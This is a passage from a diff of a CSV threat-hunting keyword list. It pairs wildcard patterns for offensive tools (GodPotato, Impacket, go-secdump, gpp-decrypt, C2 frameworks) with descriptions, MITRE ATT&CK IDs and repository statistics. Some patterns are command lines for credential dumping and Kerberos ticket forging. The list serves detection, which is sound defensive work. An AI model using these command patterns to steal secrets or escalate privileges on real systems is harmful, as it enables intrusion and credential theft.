Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*go-external-c2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*GoFetchAD/GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*GoFetch-master*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*gohaleygoandhackawaythegibson*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*golang_c2-master*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*golden_ticket.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GoldenGMSA.exe*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*GoldenGMSA-main*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*goMatrixC2.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*goMatrixC2-main*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*GooDork*","offensive_tool_keyword","GooDork","GooDork is a simple python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. by analyzing results from searches using regular expressions that you supply","T1136 - T1560 - T1213","TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/k3170makan/GooDork","1","0","N/A","N/A","2","123","39","2013-06-08T23:13:12Z","2012-03-16T22:40:40Z" @@ -11002,15 +11153,15 @@ "*google-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*goPassGen-master*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*gopherus --exploit mysql*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" "*gophish-send-mail.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" -"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*gorsair -t *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" -"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" -"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*gosecretsdump -ntds *-system *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gosecure/pyrdp*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "*go-shellcode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" @@ -11032,19 +11183,19 @@ "*govolution/avet*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*goZulipC2.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" "*goZulipC2-main*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" -"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*gppassword.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*gpp-decrypt *","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gpp-decrypt.py -f groups.xml*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gpp-decrypt.rb*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" -"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Gr1mmie/AtlasC2*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*GrantMailboxAccess.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - 